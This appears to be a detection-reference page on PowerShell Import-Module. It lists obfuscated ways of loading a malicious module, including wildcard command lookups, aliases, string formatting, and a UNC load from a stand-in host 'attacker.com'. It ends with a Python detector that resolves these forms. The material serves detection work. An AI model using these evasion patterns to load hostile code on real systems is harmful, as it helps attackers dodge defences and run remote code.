Import-Module
Load PowerShell modules from disk, UNC paths, or the module store. Used to load malicious modules containing custom cmdlets or offensive toolkits.
Binary Paths
PowerShell cmdlet
Glob Patterns
| Pattern | Notes |
|---|---|
| `& (gcm I*-M*) -Name \\attacker.com\share\evil.psm1` | Wildcards on both verb and noun; loads module from UNC path |
| `& (gcm Import-M*) -Name evil.psm1` | Star suffix matches 'odule' |
| `& (gcm I?port-Module) -Name evil.psm1` | Single-character wildcard replaces 'm' |
| `ipmo -Name evil.psm1` | Built-in alias 'ipmo' for Import-Module |
| `& (gal ip?o) -Name evil.psm1` | Get-Alias with wildcard resolves 'ipmo' |
| `& (gcm I[l-n]port-Module) -Name evil.psm1` | Character range [l-n] matches 'm' in Import; it is the only character in the range that satisfies Import-Module |
| `& (gcm *-Module) -Name evil.psm1` | Wildcard in place of the verb, noun kept. Note: may match other *-Module cmdlets; add -CommandType Cmdlet to limit |
| `& (gcm ('{0}port-{1}' -f 'Im','Module')) -Name evil.psm1` | -f format operator constructs 'Import-Module' from fragments before gcm resolves it |
YARA Rule
Auto-generated detection rule for Import-Module
Platform Notes
Import-Module loads .psm1, .psd1, or .dll files. It can load from UNC paths (\\server\share\module.psm1) for living-off-the-land network staging. The ipmo alias is built-in. Modules can contain arbitrary cmdlets and functions that execute on import via $PSDefaultParameterValues or module scripts.
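A detection-side sketch for the patterns above, added here as an example and not part of the original page: instead of string-matching "Import-Module", it expands the wildcard or -f expression handed to gcm/gal and tests whether it can resolve to Import-Module or ipmo, and it flags UNC module sources. Assumptions: Python's fnmatch stands in for PowerShell wildcard matching (`*`, `?`, `[a-z]`), input is one logged PowerShell command per line, and the function names are hypothetical.

```python
import re
from fnmatch import fnmatchcase

# Lookup cmdlet/alias -> the name it must resolve to for Import-Module to run.
TARGETS = {"gcm": "import-module", "get-command": "import-module",
           "gal": "ipmo", "get-alias": "ipmo"}
LOOKUP = re.compile(
    r"[&.]\s*\(\s*(gcm|get-command|gal|get-alias)\s+(\S.*?)\)(?:\s|$)", re.I)
DIRECT = re.compile(r"(?<![\w-])(?:ipmo|import-module)(?![\w-])", re.I)
FORMAT = re.compile(r"\(?\s*'([^']*)'\s*-f\s*(.+?)\)?\s*")
UNC = re.compile(r"\\\\[^\\\s]+\\\S+")

def expand(arg):
    """Return the wildcard pattern given to gcm/gal, resolving a -f format string."""
    m = FORMAT.fullmatch(arg)
    if not m:
        return arg.split()[0].strip("'\"")
    parts = re.findall(r"'([^']*)'", m.group(2))
    fill = lambda g: parts[int(g.group(1))] if int(g.group(1)) < len(parts) else ""
    return re.sub(r"\{(\d+)\}", fill, m.group(1))

def classify(command):
    """Return (loads_module, via, unc_source) for one logged command line."""
    unc = bool(UNC.search(command))
    m = LOOKUP.search(command)
    if m:
        pattern = expand(m.group(2).strip()).lower()
        # Would this pattern match the real command name? Then treat it as a hit.
        if fnmatchcase(TARGETS[m.group(1).lower()], pattern):
            return True, "wildcard-lookup", unc
    if DIRECT.search(command):
        return True, "direct", unc
    return False, None, unc

# Constructed sample lines: the first three reuse patterns from the table above,
# the last is a benign lookup that must not alert.
SAMPLES = [
    r"& (gcm I*-M*) -Name \\attacker.com\share\evil.psm1",
    r"& (gcm ('{0}port-{1}' -f 'Im','Module')) -Name evil.psm1",
    r"& (gal ip?o) -Name evil.psm1",
    r"& (gcm Get-Ch*) -Path C:\Temp",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(classify(line), line)
```

A wildcard-lookup hit combined with a UNC source is the higher-priority signal; a "direct" hit alone is ordinary administrative use and needs context before alerting.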